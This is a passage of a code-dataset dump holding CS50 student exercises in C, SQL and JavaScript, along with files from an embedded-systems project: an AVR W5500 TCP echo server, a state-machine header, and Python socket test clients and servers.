"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nint main(void)\n{\n int n;\n int list[] = {1,2,4,5,6,7,9,12};\n int found = -1;\n int pos = 0;\n clock_t c1;\n printf(\"Input your number: \");\n scanf(\"%d\", &n);\n\n printf(\"El array está formado por \");\n \n int size = sizeof list / sizeof list[0];\n //start timer\n clock_t c0 = clock();\n for (int i = 0; i < size; i++)\n {\n printf(\"%i, \", list[i]); \n if (n == list[i])\n {\n c1 = clock();\n \n found = 0;\n pos = i+1;\n }\n }\n //stop timer\n clock_t c2 = clock();\n double found_diff_ms = (c1 - c0) * 1000. / CLOCKS_PER_SEC;\n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"\\n\");\n if(found == 0)\n {\n printf(\"Your number was found!: %i, in the %ith position in %f ms\\n\", n, pos, found_diff_ms);\n }\n else\n {\n printf(\"Your number was not found!\\n\");\n }\n printf(\"Search took %f ms\\n\", total_diff_ms);\n}"
},
{
"alpha_fraction": 0.7115384340286255,
"alphanum_fraction": 0.7163461446762085,
"avg_line_length": 33.83333206176758,
"blob_id": "12af1bbcf8615d7a1e1870a7407c9c1ebac5c512",
"content_id": "61accbaa014ac30e081f0032337bbb6f1eb580a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 6,
"path": "/pset7/movies/11.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT m.title FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nINNER JOIN ratings r ON r.movie_id = m.id\nWHERE p.name = 'Chadwick Boseman' ORDER BY r.rating DESC\nLIMIT 5"
},
{
"alpha_fraction": 0.4984164834022522,
"alphanum_fraction": 0.5182105898857117,
"avg_line_length": 23.05714225769043,
"blob_id": "395b1af3a1e60c0f23356220cc04823e91b40c26",
"content_id": "632b462cbb43820b772cf10c07e3de354e491020",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2526,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 105,
"path": "/pset4/recover/recover.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n\ntypedef uint8_t BYTE;\n\nvoid closeFile(FILE *file);\nFILE *createFile(char *filename);\n\nint main(int argc, char *argv[])\n{\n /*\n ope memory card\n repat until end of car:\n read 512 bytes into buffer\n if start of new jpeg\n if first jpeg\n ...\n else\n else\n if already found jpeg\n .... \n close any reamining file\n */\n if (argc <= 1 || argc > 2)\n {\n fprintf(stderr, \"Usage: ./recover card.raw\\n\");\n return 1;\n }\n // Open input file\n FILE *inptr = fopen(argv[1], \"r\");\n if (inptr == NULL)\n {\n fprintf(stderr, \"Could not open %s.\\n\", argv[1]);\n return 1;\n }\n\n //buffer 512 bytes to store what we read from file\n BYTE buffer[512];\n\n //number of images found\n int imgcount = 0;\n\n //file name\n char filename[] = \"000.jpg\";\n \n //output file pointer\n FILE *outptr = NULL; \n\n //number of element returns (==bytes)\n size_t n = 512;\n \n while (!feof(inptr))\n {\n //start reading in chunks of 512 bytes\n n = fread(buffer, sizeof(BYTE), 512, inptr);\n if (buffer[0] == 0xff && buffer[1] == 0xd8 && buffer[2] == 0xff && (buffer[3] & 0xf0) == 0xe0)\n {\n //a new jpeg file has found. check if we have a previous file opened and close it first.\n if (outptr != NULL) \n {\n closeFile(outptr);\n }\n //format name\n sprintf(filename, \"%03i.jpg\", imgcount);\n imgcount++;\n // create output file\n outptr = createFile(filename);\n }\n if (outptr != NULL)\n {\n //write into the output file if blocks are complete\n if (n == 512)\n {\n fwrite(buffer, sizeof(BYTE), 512, outptr);\n }\n } \n }\n // Close any remaining open file\n closeFile(outptr);\n closeFile(inptr);\n //printf(\"%i\\n\", imgcount);\n}\n\nvoid closeFile(FILE *file)\n{\n //check whether the file is not null and close it\n if (file != 0 || file != NULL)\n {\n fclose(file);\n }\n}\n\nFILE *createFile(char *filename)\n{\n //create a new file a return the pointer\n FILE *outptr = fopen(filename, \"w\");\n if (outptr == NULL)\n {\n //if opening the file goes wrong return a NULL pointer\n fprintf(stderr, \"Could not create %s.\\n\", filename);\n return NULL;\n }\n return outptr;\n}\n"
},
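The whole of recover.c hinges on the four-byte JPEG signature test applied to 512-byte blocks. A compact Python sketch of the same scan, where the card filename and block size mirror the C version (requires Python 3.8+ for the walrus operator):

def recover(path="card.raw"):
    out, count = None, 0
    with open(path, "rb") as card:
        while block := card.read(512):
            # A new JPEG starts with ff d8 ff eX.
            if len(block) >= 4 and block[:3] == b"\xff\xd8\xff" and block[3] & 0xF0 == 0xE0:
                if out:
                    out.close()
                out = open(f"{count:03}.jpg", "wb")
                count += 1
            if out:
                out.write(block)
    if out:
        out.close()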
{
"alpha_fraction": 0.4816513657569885,
"alphanum_fraction": 0.5,
"avg_line_length": 12.6875,
"blob_id": "5f4ab284733217d7a32f12cbe87a62fdefcf8f6d",
"content_id": "fc9be95066d74b6c9279d4b924fb702d022e19e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 16,
"path": "/pset0/input.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main() {\n \n /* char a[100];\n gets(a); \n printf(\"You entered: %s\\n\", a); */\n\n int a, b;\n printf(\"Enter two numbers:\\n\");\n scanf(\"%i %i\", a, b);\n printf(\"\\nSum: %i\\n\", a+b);\n\n\n return 0;\n}"
},
{
"alpha_fraction": 0.6937500238418579,
"alphanum_fraction": 0.71875,
"avg_line_length": 31.200000762939453,
"blob_id": "156c62edb830cb0b64b6ce1a42ed6bc57c52c4ee",
"content_id": "0aedb3f91c6ccb5387487715569c240993d7a618",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 5,
"path": "/pset7/movies/9.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (p.name) FROM stars s\nINNER JOIN people p on p.id = s.person_id\nINNER JOIN movies m ON m.id = s.movie_id\nWHERE m.year = 2004 \nORDER by p.birth"
},
{
"alpha_fraction": 0.6388443112373352,
"alphanum_fraction": 0.6388443112373352,
"avg_line_length": 25,
"blob_id": "78f57b02d88a0694cae21e860251fe64db05e022",
"content_id": "1bd5c6c9b9425922efbf12cffe1d46afce0fbe60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 623,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 24,
"path": "/pset8/web/homepage/js/scripts.js",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "function validateForm(e) {\n if(e.preventDefault) e.preventDefault();\n \n const name = form.yourname.value;\n const email = form.youremail.value;\n const subject = form.yoursubject.value;\n const text = form.yourmessage.value;\n\n if(name === '' || email === '')\n {\n alert (\"Name and email are mandatory\");\n return false;\n }\n \n alert('Your message will be sent now. Thank you');\n form.submit();\n}\n\nconst form = document.querySelector('#formsubmit');\nif(form.attachEvent) {\n form.attachEvent(\"submit\", validateForm);\n} else {\n form.addEventListener(\"submit\", validateForm);\n}"
},
{
"alpha_fraction": 0.7089946866035461,
"alphanum_fraction": 0.7195767164230347,
"avg_line_length": 37,
"blob_id": "d9ddf48a79dab69fc90a82c04629693bde0d0994",
"content_id": "ae9eb5802379d3da8611cfbc3a4406cca340c256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 5,
"path": "/pset7/movies/10.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT(p.name) FROM people p\nINNER JOIN directors d on p.id = d.person_id\nINNER JOIN movies m ON m.id = d.movie_id\nINNER JOIN ratings r ON r.movie_id = m.id\nWHERE r.rating >= 9.0"
},
{
"alpha_fraction": 0.7009345889091492,
"alphanum_fraction": 0.7383177280426025,
"avg_line_length": 35,
"blob_id": "598791935307019ef7437ade80e3a0d6edfb1ffd",
"content_id": "13f462477a439a24f227a04425dafc5f28339335",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/pset7/movies/6.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT avg(r.rating) as Average FROM ratings r\nINNER JOIN movies m ON m.id = r.movie_id \nWHERE year = 2012"
},
{
"alpha_fraction": 0.4532374143600464,
"alphanum_fraction": 0.46043166518211365,
"avg_line_length": 11.727272987365723,
"blob_id": "999bdd0f4dbaa7c972df35eac021a29dbdbfe803",
"content_id": "3656c75dc8db070c437b37a3d40d75acbb19a348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 11,
"path": "/pset3/scanf.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main (void)\n{\n char *s = NULL;\n printf(\"s: \");\n scanf(\"%s\", s);\n printf(\"s: %s\\n\", s);\n\n return 0;\n}"
},
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.5,
"avg_line_length": 20.136363983154297,
"blob_id": "433eb22d9913012f46140e32630bbfbe8c6b2bba",
"content_id": "eeb08fef8e609f7edf1cf6ae91444fd64c89e447",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 22,
"path": "/test.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <ctype.h>\n#include <string.h>\n#include <cs50.h>\n\nint main()\n{\n int l = get_char(\"Input letter: \");\n int k = get_int(\"Input key: \");\n int ac = (int)l;\n int nc = ((ac - 65) + k) % 26;\n printf(\"ciphered relative position %i\\n\", nc);\n printf(\"cipher ASCII code: %d, letter: %c\\n\", 65 + nc, (char)(65+nc));\n\n\n /* for (int i = 65; i <= 117; i++)\n {\n printf(\"%c \", i);\n } \n printf(\"\\n\"); */\n return 0;\n}"
},
{
"alpha_fraction": 0.66144198179245,
"alphanum_fraction": 0.6739811897277832,
"avg_line_length": 34.55555725097656,
"blob_id": "6b609737601a71b52a87f5020165837cc7ea774f",
"content_id": "d8fef04b7c8a9a52baa2f29d15f270cb3a1de360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/pset7/movies/13.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (p.name) FROM people p\nINNER JOIN stars s ON p.id = s.person_id\nINNER JOIN movies m ON s.movie_id = m.id\nWHERE p.name <> 'Kevin Bacon' and m.id in ( \n\tSELECT m.id from movies m\n\tINNER JOIN stars s ON m.id = s.movie_id\n\tINNER JOIN people p ON s.person_id = p.id\n\tWHERE p.name = 'Kevin Bacon' and p.birth = 1958\n)"
},
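All of these queries target the CS50 movies database in SQLite, and outside the course tooling they can be exercised with Python's standard sqlite3 module. A small sketch (the movies.db path is an assumption), shown here with the year-2004 stars query:

import sqlite3

con = sqlite3.connect("movies.db")
query = (
    "SELECT DISTINCT p.name FROM stars s "
    "INNER JOIN people p ON p.id = s.person_id "
    "INNER JOIN movies m ON m.id = s.movie_id "
    "WHERE m.year = 2004 ORDER BY p.birth"
)
for (name,) in con.execute(query):
    print(name)
con.close()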
{
"alpha_fraction": 0.36141908168792725,
"alphanum_fraction": 0.4900221824645996,
"avg_line_length": 22.789474487304688,
"blob_id": "d0d98cb9adc3d7fbc0c4edc4e416af9ff8161619",
"content_id": "a5a5281ebf1ca6a2a0efd2e14add899b31f0948e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 19,
"path": "/pset0/output.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n\nint main(void)\n{\n printf(\"Color: %s, Number: %d, float: %5.2f \\n\", \"red\", 42, 3.14159);\n /* Color: red, Number: 42, float: 3.14 */\n\n printf(\"Pi = %3.2f\\n\", 3.14159); \n /* Pi = 3.14 */\n\n printf(\"Pi = %8.5f\\n\", 3.14159); \n /* Pi = 3.14159 */\n\n printf(\"Pi = %-8.5f\\n\", 3.14159); \n /* Pi = 3.14159 */\n\n printf(\"There are %d %s in the tree.\\n\", 22, \"apples\");\n /* There are 22 apples in the tree. */ \n}"
},
{
"alpha_fraction": 0.49833056330680847,
"alphanum_fraction": 0.5191986560821533,
"avg_line_length": 24.76344108581543,
"blob_id": "24be02d544b672004b0d4d4ea4fd1604fc07071c",
"content_id": "310ed009f0f8de95cfd3a16014cdf7d993084353",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2396,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 93,
"path": "/pset1/credit.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include <cs50.h>\n#include <math.h>\n\nvoid get_digits_array(int* digits, long number);\n\nint main(void)\n{\n string result = \"INVALID\";\n bool error = true;\n // ask for credit card number\n long creditcard = 0;\n do\n {\n creditcard = get_long(\"Number: \");\n if(creditcard > 0)\n {\n error = false;\n }\n }\n while(error);\n\n //get the number of digits in the credit card\n int length = (int) (floor(log10(creditcard)) + 1);\n int digits[length];\n //get an array of digits\n get_digits_array(digits, creditcard);\n\n //extract the control digit\n int sum = digits[length-1];\n\n //parity to know which are the digits to multiply\n int parity = length % 2;\n\n //iterate through digits of the card to calculate\n for (int i = 0; i < length - 1; i++)\n {\n int digit = digits[i];\n //multiply every other digit by 2\n if (i % 2 == parity)\n {\n digit = digit * 2;\n }\n if (digit > 9)\n {\n digit = digit - 9;\n }\n sum += digit;\n }\n printf (\"sum: %i, parity: %i\\n\", sum, parity);\n //this is another way to calcultate the control digit.\n /*The check digit (x) is obtained by computing the sum of the other digits (third row) then subtracting the units digit from 10 */\n if (sum % 10 == 0)\n {\n //extract the two first digits to know which is the issuer along wiht length\n int first_digit = digits[0];\n int second_digit = digits[1];\n if(length == 15 && first_digit == 3 && (second_digit == 4 || second_digit == 7))\n {\n result = \"AMEX\";\n }\n else if(length == 16 && first_digit == 5 &&\n (second_digit == 1 || second_digit == 2 || second_digit == 3 || second_digit == 4 || second_digit == 5))\n {\n result = \"MASTERCARD\";\n }\n else if((length == 13 || length == 16) && first_digit == 4)\n {\n result = \"VISA\";\n }\n\n }\n printf(\"%s\\n\", result);\n}\n\nvoid get_digits_array(int *digits, long number)\n{\n long temp,factor = 1;\n temp=number;\n while(temp)\n {\n temp = temp / 10;\n factor = factor * 10;\n }\n int i = 0;\n while(factor > 1)\n {\n factor = factor / 10;\n digits[i] = (int)(number / factor);\n number = number % factor;\n i++;\n }\n}\n"
}
] | 42 |
tprihoda/ECE476_Project
|
https://github.com/tprihoda/ECE476_Project
|
82254fae34aa287b311e9078b25f6fba298d8180
|
bd75d36019fd2f441f3f749eb174bb2aa1240446
|
309f6e65f053b39fdf51f76e5a57b56b679bb61b
|
refs/heads/master
| 2021-01-04T23:46:44.960735 | 2020-02-20T00:27:10 | 2020-02-20T00:27:10 | 240,801,836 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.626724123954773,
"alphanum_fraction": 0.6318965554237366,
"avg_line_length": 15.797101020812988,
"blob_id": "eb48315dc582c9a78a85cda59870d2063b4c3925",
"content_id": "db104d2f6dc00c60ed7b24a764b34e3cdfdef819",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 69,
"path": "/src/fsm.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "/* fsm.h\n *\n * Simple implementation of a finite state machine for launch \n * control\n *\n */\n\n#include <stdint.h>\n\n#define ENTRY_STATE IDLE\n\n/* \n * Defines each state's id\n */\ntypedef enum state_id\n{\n IDLE,\n IGNITION,\n FUELING,\n ERROR,\n\n NUM_STATES \n}state_id;\n\ntypedef enum ret_id\n{\n OK,\n FAIL,\n //TODO: add additional ret id's for dif transitions\n\n NUM_RETS\n}ret_id;\n\n/*\n * State struct with id, function, and status\n */\ntypedef struct state_t\n{\n state_id state;\n int8_t status;\n ret_id (* state_fn)(int8_t* status);\n}state_t;\n\nret_id idle_state(int8_t* status);\nret_id ignition_state(int8_t* status);\nret_id fueling_state(int8_t* status);\nret_id error_state(int8_t* status);\n\nvoid init_sm(state_t* states);\nstate_id sm_engine(state_t* curr_state);\n\nstruct state_transition\n{\n state_id src_state;\n ret_id ret;\n state_id dst_state;\n};\n\n/* \n * Lookup table for state transitions indexed by src_state and then ret\n */\nstruct state_transition transition_lookup[NUM_STATES][NUM_RETS] = \n{\n //IDLE(OK)->IDLE \n { {IDLE, OK, IDLE}, {IDLE, FAIL, IDLE} },\n //IGN\n { {IGNITION, OK, IGNITION} }\n //...\n};\n\n"
},
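The transition_lookup array above is the classic table-driven state machine: the next state is a pure lookup on (current state, return code). A Python sketch of the same engine shape; the concrete transitions below are placeholders of my own, since the table in the header is intentionally unfinished:

IDLE, IGNITION, FUELING, ERROR = range(4)
OK, FAIL = range(2)

# transitions[state][ret] -> next state (placeholder wiring)
transitions = {
    IDLE:     {OK: IGNITION, FAIL: ERROR},
    IGNITION: {OK: FUELING,  FAIL: ERROR},
    FUELING:  {OK: IDLE,     FAIL: ERROR},
    ERROR:    {OK: IDLE,     FAIL: ERROR},
}

def sm_engine(state, handlers):
    # Run the current state's handler, then look up the next state.
    ret = handlers[state]()
    return transitions[state][ret]

handlers = {s: (lambda: OK) for s in (IDLE, IGNITION, FUELING, ERROR)}
state = sm_engine(IDLE, handlers)  # IDLE -> IGNITION under this wiring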
{
"alpha_fraction": 0.45719990134239197,
"alphanum_fraction": 0.4908909499645233,
"avg_line_length": 22.02298927307129,
"blob_id": "2535350eed0480ed639112cdc0b8c3bf593db1ff",
"content_id": "a6747e362420fd92fe8b5550fa03a9fd74eecbec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4007,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 174,
"path": "/src/tcp_server.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <string.h>\n#include <util/delay.h>\n\n#include \"tcp_server.h\"\n#include \"socket.h\"\n\n#define USART_BAUDRATE 9600\n#define BAUD_PRESCALE ((( F_CPU / ( USART_BAUDRATE * 16UL))) - 1)\n\nvoid initSPI()\n{\n //DDRB |= (1 << PB5) | (1 << PB3) | (1 << PB2); //sck, mosi, ss outputs\n DDRB |= (1 << PB1) | (1 << PB2) | (1 << PB6); //sck, mosi, ss outputs\n SPCR |= (1 << SPE) | (1 << MSTR);\n}\n\nvoid USART_Init( void )\n{\n DDRD |= (1<<PD3);\n\n unsigned int baud = BAUD_PRESCALE;\n\n UBRR1H = (unsigned char) (baud>>8);\n UBRR1L = (unsigned char) baud;\n\n UCSR1B = (1<<RXEN1) | (1<<TXEN1);\n UCSR1C = (1<<USBS1) | (3<<UCSZ10);\n}\n\nuint8_t getByte(void)\n{\n // Check to see if something was received\n while (!(UCSR1A & _BV(RXC1)));\n return (uint8_t) UDR1;\n}\n\nvoid putByte(unsigned char data)\n{\n // Stay here until data buffer is empty\n while (!(UCSR1A & _BV(UDRE1)));\n UDR1 = (unsigned char) data;\n}\n\nvoid writeString(char *str)\n{\n while (*str != '\\0')\n {\n putByte(*str);\n ++str;\n }\n}\n\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port)\n{\n int32_t ret;\n uint16_t size = 0, sentsize = 0;\n\n switch(getSn_SR(sn))\n {\n case SOCK_ESTABLISHED:\n writeString(\"Established\\n\");\n if(getSn_IR(sn) & Sn_IR_CON)\n {\n setSn_IR(sn,Sn_IR_CON);\n }\n if((size = getSn_RX_RSR(sn)) > 0) // Don't need to check SOCKERR_BUSY because it doesn't not occur.\n {\n if(size > DATA_BUF_SIZE) size = DATA_BUF_SIZE; // clips size if larger that data buffer\n ret = recv(sn, buf, size);\n\n if(ret <= 0) return ret; // check SOCKERR_BUSY & SOCKERR_XXX. For showing the occurrence of SOCKERR_BUSY.\n size = (uint16_t) ret;\n sentsize = 0;\n\n while(size != sentsize)\n {\n ret = send(sn, buf+sentsize, size-sentsize);\n if(ret < 0)\n {\n close(sn);\n return ret;\n }\n sentsize += ret; // Don't care SOCKERR_BUSY, because it is zero.\n }\n }\n break;\n case SOCK_CLOSE_WAIT :\n if( (ret = disconnect(sn)) != SOCK_OK) return ret;\n break;\n case SOCK_INIT :\n if( (ret = listen(sn)) != SOCK_OK) return ret;\n writeString(\"Init\\n\");\n break;\n case SOCK_CLOSED:\n if( (ret = socket(sn, Sn_MR_TCP, port, 0x00)) != sn) return ret;\n writeString(\"Closed\\n\");\n default:\n break;\n }\n return 1;\n}\n\nint main()\n{\n USART_Init();\n initSPI();\n\n // Built-in LED\n DDRD |= (1 << PD4);\n\n uint8_t buf[100];\n char buffer[10];\n\n struct wiz_NetInfo_t network_config = \n {\n {MAC},\n {IP},\n {SUBNET},\n {GATEWAY},\n {DNS},\n 2\n };\n\n struct wiz_NetInfo_t temp;\n\n uint8_t txsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n uint8_t rxsize[8] = {1, 0, 0, 0, 0, 0, 0, 0};\n\n //setup delay\n _delay_ms(2000);\n\n wizchip_init(txsize, rxsize);\n wizchip_setnetinfo(&network_config);\n wizchip_getnetinfo(&temp);\n\n uint8_t version = 0;\n uint16_t rcr = 0;\n uint8_t phycfgr = 0;\n\n PORTD |= (1 << PD4);\n\n while(1)\n {\n version = getVERSIONR(); \n rcr = getRCR(); \n\n phycfgr = getPHYCFGR();\n itoa(phycfgr, buffer, 16);\n writeString(buffer);\n\n _delay_ms(50);\n setPHYCFGR(0xF8);\n\n phycfgr = getPHYCFGR();\n itoa(phycfgr, buffer, 16);\n writeString(buffer);\n\n //itoa(temp.ip[0], buffer, 10);\n //writeString(buffer);\n\n int8_t ret = loopback_tcps(0, buf, 8080);\n\n //itoa(ret, buffer, 10);\n //writeString(buffer);\n\n _delay_ms(1000);\n }\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.644385039806366,
"alphanum_fraction": 0.686274528503418,
"avg_line_length": 26.317073822021484,
"blob_id": "eee5900f99611b46f24e0e3f572905bfaff0bbde",
"content_id": "20844eb20109d23fa10206d4d6ee7cb614c99873",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1122,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 41,
"path": "/Xinyu/client.py",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "import socket\n#import numpy as np\nimport time\nimport random\nimport threading\n#create a socket object\ndef client(port,lamda):\n#\tfor i in range (num_socket):\n client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#hostname = socket.gethostname()\n#host =socket.gethostbyname(hostname)\n host = \"192.168.1.110\"\n#define a port on which to connect\n\n#\t\tport = 8080+i\n#connect to server on local computer\n client.connect((host,port))\n while(1):\n#sample poisson random time\n t = random.expovariate(lamda)\n time.sleep(t)\n#receive data from the server\n data = \"Hello\"\n tosend = data.encode()\n client.sendall(tosend)\n #data = client.recv(1024)\n #s = data.decode()\n #print(s)\n#\t\tcheck = (s=='Thank you for connecting')\n#\t\tprint(check)\n\n\n\nthreading1 = threading.Thread(target = client,args= (8080,4))\nthreading2 = threading.Thread(target = client,args= (8081,3))\nthreading3 = threading.Thread(target = client,args= (8082,2))\nthreading4 = threading.Thread(target = client,args= (8083,1))\nthreading1.start()\nthreading2.start()\nthreading3.start()\nthreading4.start()\n\n\n"
},
{
"alpha_fraction": 0.6884549856185913,
"alphanum_fraction": 0.7207130789756775,
"avg_line_length": 28.450000762939453,
"blob_id": "8b8b342ce7dbd9b47247520811778d8454777959",
"content_id": "5aafff2113e374315c9eb53ec32ef4af96196472",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 40,
"path": "/Xinyu/server.py",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#!usr/bin/env python3\nimport threading\nimport socket\nimport numpy as np\nfrom scipy.stats import poisson\n\n\nhostname = socket.gethostname()# get local machine name\nIPAddr = socket.gethostbyname(hostname)#get local ip address\n#IPAddr = '192.168.0.10'\nport = 8080\n#print(\"Your computer name is: \" + hostname)\n#print(\"Your Computer IP Address is: \" +IPAddr)\n#port = 50000 #reserve a port for the service\nlist_sock = []\nnum_sock = 4\n#generating poisson distributed data\n#data_poisson = poisson.rvs(mu = 3, size = 4000)\n#print(data_poisson[0:10])\nfor i in range(num_sock):\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)#create socket object\n\n\ts.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\ts.bind((IPAddr, port+i))#bind to the port\n\ts.listen(10)#wait for client connection\n\tlist_sock.append(s)\n\tprint( \"[*] Server listening on %s %d\" %(IPAddr,(port+i)))\n\t#establish connection with client\n\tconn, addr = s.accept()\n\tprint ('Got connection from',addr)\n\n\tconn.send('Thank you for connecting'.encode())\n\t#data = data_poisson[0:10]\n\t#conn.send(data)\n#with conn:\n#\tprint('Connected by',addr)\n#\twhile True:\n#\t\tdata = conn.recv(1024)\n#\t\tif not data: break\n#\t\tconn.sendall(data)\n"
},
{
"alpha_fraction": 0.5320196747779846,
"alphanum_fraction": 0.5990147590637207,
"avg_line_length": 21.55555534362793,
"blob_id": "a057163f3092088830a20127a17a57610b6c53f9",
"content_id": "e7378fb3446869894165fec30c2332e7d2b32d65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1015,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 45,
"path": "/src/tcp_server.h",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
"text": "#ifndef _TCP_SERVER_H_\n#define _TCP_SERVER_H_\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include <stdint.h>\n\n#define MAC 0x44, 0xFF, 0xFF, 0x00, 0x00, 0x00\n#define IP 192, 168, 1, 110 \n#define SUBNET 255, 255, 255, 0 \n#define GATEWAY 192, 168, 1, 1 \n#define DNS 8, 8, 8, 8\n\n#define SOCKET 0\n#define PORT 8080\n\n#pragma message(\"Wizchip ID: \" _WIZCHIP_ID_)\n\n/* Loopback test debug message printout enable */\n#define\t_LOOPBACK_DEBUG_\n\n/* DATA_BUF_SIZE define for Loopback example */\n#ifndef DATA_BUF_SIZE\n #define DATA_BUF_SIZE ( 1024 )\n#endif\n\n/************************/\n/* Select LOOPBACK_MODE */\n/************************/\n#define LOOPBACK_MAIN_NOBLOCK 0\n#define LOOPBACK_MODE LOOPBACK_MAIN_NOBLOCK\n\n// TCP server loopback test example\nint32_t loopback_tcps(uint8_t sn, uint8_t* buf, uint16_t port);\n\n// TCP server\nint32_t tcps(uint8_t sn, uint8_t* buf, uint16_t port);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif // _TCP_SERVER_H_\n"
},
{
"alpha_fraction": 0.4777162969112396,
"alphanum_fraction": 0.5333527326583862,
"avg_line_length": 21.728477478027344,
"blob_id": "8d59936ab27f9fa701de38103f284081e1ec74f4",
"content_id": "f60faaf8db41ab57700dd6222c3fb7046b0d0e71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3433,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 151,
"path": "/src/main.c",
"repo_name": "tprihoda/ECE476_Project",
"src_encoding": "UTF-8",
